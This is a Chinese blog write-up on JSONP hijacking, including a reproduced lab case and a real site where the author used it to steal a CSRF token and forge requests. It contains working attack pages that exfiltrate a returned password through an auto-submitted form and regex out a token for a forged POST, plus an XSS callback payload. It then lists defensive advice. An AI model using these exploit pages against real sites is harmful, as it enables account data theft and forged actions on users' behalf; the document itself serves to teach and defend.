jsonp劫持漏洞

最新推荐文章于 2024-08-20 11:16:35 发布
最新推荐文章于 2024-08-20 11:16:35 发布
阅读量3.1k 收藏 6
点赞数 1
原文链接:https://xz.aliyun.com/t/5143
版权

原文https://xz.aliyun.com/t/5143

第一次遇到了jsonp劫持漏洞,并且通过此漏洞绕过token进行成功的csrf攻击,仅以此文进行记录分享。

JSONP

什么是jsonp?

Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。

JSONP的语法和JSON很像,简单来说就是在JSON外部用一个函数包裹着。JSONP基本语法如下:

callback({ "name": "kwan" , "msg": "获取成功" });

JSONP原理就是动态插入带有跨域url的<script>标签,然后调用回调函数,把我们需要的json数据作为参数传入,通过一些逻辑把数据显示在页面上。

常见的jsonp形式类似:

http://www.test.com/index.html?jsonpcallback=hehe

传过去的hehe就是函数名,服务端返回的是一个函数调用,可以理解为:evil就是一个函数,(["customername1","customername2"])就是函数参数,网站前端只需要再编写代码处理函数返回的值即可。

jsonp劫持漏洞

漏洞很简单,在本地复现一下。

【JSONP_callback.php】:jsonp接口,返回用户的账户密码(简单起见,就直接写死返回值了)

<?php
    header('Content-type: application/json');
    $callback = $_GET["callback"];
    //json数据
    $json_data = '{"customername1":"user1","password":"12345678"}';
    //输出jsonp格式的数据
    echo $callback . "(" . $json_data . ")";
?>

请求该接口并加上callback=hello,返回值如下

在返回值开头中可见hello,如果我们修改callback的值为其他值,此处的返回值也会相应改变。我们可以劫持callback参数,自己构造callback处理函数,受害者点击我们伪造的链接后,向真正的jsonp接口发起请求,请求得到数据的处理方式由我们自己的callback处理函数处理,由此可以达到劫持目的。

比如,我们编写如下攻击页面:

<html>
<head>
<title>test</title>
<meta charset="utf-8">
<script type="text/javascript">
function hehehe(obj){
    alert(obj["password"]);
    var myForm = document.createElement("form");
    myForm.action="http://localhost/JSONP_redirect.php";
    myForm.method = "GET";  
    for ( var k in obj) {  
        var myInput = document.createElement("input");  
        myInput.setAttribute("name", k);  
        myInput.setAttribute("value", obj[k]);  
        myForm.appendChild(myInput);  
    }  
    document.body.appendChild(myForm);  
    myForm.submit();  
    document.body.removeChild(myForm);
}
</script>
</head>
<body>
<script type="text/javascript" src="http://localhost/JSONP_callback.php?callback=hehehe"></script>
</body>
</html>

用户访问此页面后,会自动去请求JSONP_callback.php,返回值会进入hehehe函数进行处理,在hehehe函数中,会弹出密码值、创建表单自动提交用户密码到攻击者服务器、最后重定向到百度。实际效果如下:

删除弹窗之后,攻击过程对受害者就是完全不可见的。

绕过token防护进行csrf攻击

JSONP劫持其实是属于CSRF攻击范畴的,毕竟要拿到敏感数据是需要用户登陆并点击的,所以JSONP劫持是CSRF攻击的一种手段。既然属于CSRF攻击范畴,那么JSONP劫持所作的自然也不止是读取敏感信息(其实在这点上,单独的csrf攻击还不好去读取敏感数据),利用JSONP还可以在某些情况下绕过csrf常见防护形式之一的token防护。

如开头所说,我上周成功利用了JSONP劫持来完成了一次csrf攻击,我以此例来说明如果通过JSONP绕过token防护进行csrf攻击。

首先,在目标站上的请求中我发现总是有参数jscallbackhtmlcallback,所以我在一个返回敏感信息的url后面添加了这2个参数,发现均有返回,成功确认此处有jsonp劫持漏洞,然后,我开始去寻找更多的jsonp接口,出乎意料的是,我发现在整个网站上都存在jsonp劫持,而不是单纯在某个连接上。我猜测这一情况的原因是网站每个页面上的通用代码出了问题,或者是某个js文件出了问题。我查看了几个页面的源代码,发现可能是第一种原因,我在这些源码找到了多个jscallback和htmlcallback。有了jsonp之后,我像上面一样编写攻击页面来获取敏感信息。

然后在对关键操作进行csrf漏洞挖掘的时候,我发现在表单中有个隐藏的token值,灵光一闪!既然全站都有jsonp,我为什么不在这个操作页面通过jsonp获取到整个页面代码,读取其中的token值,再构造完整的表单,自动提交即可完成csrf攻击!完美的操作。

说干就干,确定这个页面的jsonp没有问题(这儿的图截错了,忘了改callback参数值):

编写攻击页面的代码如下:

<html>
<head>
<title>test</title>
<meta charset="utf-8">
</head>
<body>
<div id="test"></div>
<script type="text/javascript">
function test(obj){
    // 获取对象中的属性值
    var content = obj['html']
    // 正则匹配出参数值
    var token=content.match('token = "(.*?)"')[1];
    // 添加表单节点
    var parent=document.getElementById("test");
    var child=document.createElement("form");
    child.method="POST";
    child.action="http://vuln.com/del.html";
    child.id="test1"
    parent.appendChild(child);
    var parent_1=document.getElementById("test1");
    var child_1=document.createElement("input");
    child_1.type="hidden";child_1.name="token";child_1.value=token;
    var child_2=document.createElement("input");
    child_2.type="submit";
    parent_1.appendChild(child_1);
    parent_1.appendChild(child_2);
}
</script>
<script type="text/javascript" src="http://vuln.com/caozuo.html?htmlcallback=test"></script>
</body>
</html>

htmlcallback返回一个对象obj,以该对象作为参数传入test函数,操作对象中属性名为html的值,正则匹配出token,再加入表单,自动提交表单完成操作,用户点击该攻击页面即收到csrf攻击。

在一个功能点完成csrf攻击后,我基本可以基于此,完成全站的csrf攻击。

但是,在操作另一个功能点时,发现该功能点还进行referer验证,需要绕过referer。绕过referer也是csrf攻击中常见的场景了,常见绕过方法:

  • 空referer
  • referer过滤不严谨

这几天我还看到了一个方法,没有试验过:使用requset merging bypass referer(jsonp)检测

可以看到,想要通过jsonp劫持来绕过token进行csrf还是挺麻烦的,条件太多:

  1. 有jsonp劫持
  2. 能在源码里找到token
  3. 没有referer防护

jsonp除了连打csrf之外,还可以连打xss,即把callback参数值写成xss payload:

?callback=<script>alert()</script>

防护建议

摘自:http://blog.knownsec.com/2015/03/jsonp_security_technic/

1、严格安全的实现 CSRF 方式调用 JSON 文件:限制 Referer 、部署一次性 Token 等。
2、严格安装 JSON 格式标准输出 Content-Type 及编码( Content-Type : application/json; charset=utf-8 )。
3、严格过滤 callback 函数名及 JSON 里数据的输出。
4、严格限制对 JSONP 输出 callback 函数名的长度(如防御上面 flash 输出的方法)。
5、其他一些比较“猥琐”的方法:如在 Callback 输出之前加入其他字符(如:/**/、回车换行)这样不影响 JSON 文件加载,又能一定程度预防其他文件格式的输出。还比如 Gmail 早起使用 AJAX 的方式获取 JSON ,听过在输出 JSON 之前加入 while(1) ;这样的代码来防止 JS 远程调用

参考

http://blog.knownsec.com/2015/03/jsonp_security_technic/

https://xz.aliyun.com/t/176

https://www.leavesongs.com/HTML/sina-jsonp-hijacking-csrf-worm.html

https://www.colabug.com/3885838.html

http://docs.ioin.in/writeup/threathunter.org/_topic_59a9329cec721b1f1966ea2e/index.html

purpledragon9527
关注
同源策略——CORS和JSONP劫持漏洞
m0_61506558的博客
11-03 749
同源策略是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的媒介。如果两个URL拥有相同的协议(http、https)、端口和主机,那么这两个URL就是同源的。JSONP(JSON with Padding) 是 json 的一种”使用模式”,可以让网页从别的域名(网站)那获取资料,即跨域读取数据。JSONP实现跨域请求的原理简单的说,就是动态创建标签,然后利用的 src不受。
浅谈JSONP跨域漏洞
weixin_39664643的博客
10-11 2811
浅谈JSONP跨域漏洞 CSRF(Cross site request forgery)跨站请求伪造,一种挟持用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法,跟XSS相比,XSS 利用的是网站对用户的信任,CSRF 利用的是网站对用户网页浏览器的信任。 提起CSRF,可能很多人都会想到修改个人资料、授权登陆等等攻击场景,可以发现这两个场景都是写入型的CSRF漏洞,通常会忽视更常见的读取型的CSRF漏洞,主流如下两种 JSONP跨域资源读取 CORS跨域资源读取 当持有敏感资源数据的服务器没
生命在于学习——Jsonp漏洞
易水哲的博客
09-05 1600
Jsonp学习笔记记录。
渗透测试-JSONP数据劫持漏洞
cdyunaq的博客
03-31 7673
​介绍 JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。 更通俗的说法:JSONP 就是利用<script>标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生..
JSONP跨域访问漏洞
最新发布
YhMjQx的博客
08-20 771
本篇文章主要讲解JSONP跨域访问过程中存在的漏洞机制
JSONP数据劫持漏洞
qq_50854662的博客
04-19 1186
JSONP数据劫持漏洞
浅谈JSONP劫持漏洞
我的博客,不一样的自我表达
07-23 279
那么攻击者可以构造url:http://127.0.0.1/aphp.test.html或http://127.0.0.1/attack.htm?例如http://aphp.test/jsonp/test_jsonp.php?一般开发中,前端可以很方便的调用,一般输出Callback都是可定制的,如果过滤不严格,或者Content-Type设置不合适,就会导致xss。由于浏览器同源策略的限制,浏览器只允许XmlHttpRequest请求当前相同(域名、协议、端口)的资源,对请求脚本资源没有限制。
JSONP劫持漏洞EXP
weixin_50464560的博客
08-11 449
JSONP EXP 方法一:JavaScript调用 弹窗代码(弹窗JSON数据): <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>JSONP EXP跨域测试</title> </head> <body> <script> function jsoncallback(json){ //new
浅谈CSRF跨域读取型漏洞JSONP劫持
记录学习,一起进步
03-06 1000
CSRF跨域读取型漏洞JSONP劫持
JSON劫持漏洞
W404129262的博客
07-15 900
项目在运行当中被安全部扫描扫描得到了JSON漏洞。一开始想着是把JSON包提高包的等级,但是还是没有解决掉JSON劫持的问题,安全部扫描后得到了一系列的修复漏洞方式,先把背景和对方提供的解决方案发出来。 这是关于漏洞背景方面 采用JSON文本的数据交互方式由于可以天然的在浏览器中使用,所以随着ajax和web业务的发展得到了广大的发展,各种大型网站都开始使用,包括Yahoo,Google,Tencent,Baidu等等。 但是如果这种交互的方式用来传递敏感的数据,并且传输的时候没有做太多...
详解JSON和JSONP劫持以及解决方法
10-17
此外,文章中还提供了一个JSONP劫持漏洞实例,它演示了如何利用客户端的callback函数从服务器获取数据。实例中包含了一个PHP脚本`getUser.php`,该脚本会输出JSONP格式的数据,并在客户端的script标签中通过指定的...
同源策略与cors跨域及jsonp劫持
j1044957016的博客
05-31 868
文章目录前言一、同源策略二、Ajax技术三、CORS跨域1.简单请求2.非简单请求3.漏洞成因及修复四、jsonp劫持总结 前言 本文整理同源策略,Ajax,cors跨域及jsonp劫持 一、同源策略 同源策略(Same Origin Policy):该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。(防止内部资源被外部页面脚本读取或篡改) 浏览器的同源策略规定: 不同域的客户端脚本在没有
漏洞利用】JSONP跨域请求漏洞 挖掘、利用详解
weixin_44023442的博客
03-13 3297
参考文章 轻松搞定JSONP跨域请求 jsonp跨域原理,使用以及同源策略 跨域漏洞JSONP和CORS跨域资源共享 Tag: Ref: [[019.同源策略]] 本片文章仅供学习使用,切勿触犯法律! 未写完,待补充 概述 总结 一、漏洞介绍 JSONP介绍 JSONP 是 JSON with padding(填充式 JSON 或参数式 JSON)的简写。 JSONP是一种利用HTML中<script></script>元素标签,远程调用json文件来实现数据传递的技术,
CORS配置漏洞/jsonp劫持
weixin_71093833的博客
08-02 2037
cors漏洞简单摘要
JSONP漏洞详解
m0_64481831的博客
03-15 1192
JSONP是基于JSON格式的为解决跨域请求资源而产生的解决方案。实现的基本原理就是动态创建标签,然后利用标签的src不受同源策略约束来跨域获取数据。JSONP有两部分组成:回调函数和数据。回调函数就是当响应到来时应该在页面中调用的函数。数据就是传入回调函数中的JSON数据。
jsonp漏洞手动挖掘
qq_42746827的博客
11-10 1307
jsonp漏洞挖掘利用 Jsonp(JSON with Padding) ,可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaT
JSONP劫持
weixin_38166557的博客
09-25 169
什么是 JSONP 劫持 JSONP就是为了跨域 获取资源 而产生的一种 非官方 的技术手段(官方的有 CORS 和 postMessage),它利用的是 script 标签的 src 属性不受同源策略影响的特性。 我们遇到过很多的劫持的攻击方法,比如:dns 劫持、点击劫持、cookie劫持等等,也正如劫持这个词的含义:“拦截挟持”,dns 劫持就是把 dns 的解析截获然后篡改,...
Jsonp&Cors跨域(同源策略、跨域、劫持漏洞
精品博客,你值得一看~
08-16 869
CORS)跨域资源共享,其思想是使用自定义的HTTP头部字段让浏览 器与服务器进行沟通,它允许浏览器向跨域服务器发出XMLHttpRequest请求,从而克服AJAX只能同源 使用的限制。CORS的基本原理是当浏览器在进行跨域请求时,会在请求中添加头部origin来表明自己的协议、主 机、端口号,当服务器接到请求并且看到这个origin头部时,如果设置过允许此域名进行访问,就得添 加头部Access-Control-Allow-Origin。
实战之JSONP劫持漏洞的发现
weixin_50464560的博客
08-20 777
0x01 前言记录一次JSONP劫持的发现过程和一些思考,和大家一起分享,一起进步0x02 发现通过爬取页面获取到可疑的urlxxx.xxx.xxx.com/recom?appkey=xxx&adspot=xxx&max_behot_time=0&max_count=5&tag=0&columns=0&callback=uarJsonCallback 看到了这里的callback函数根据url的命名可以基本上推断出来这个服务应该是给目标站推送一些数据,其中主站
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值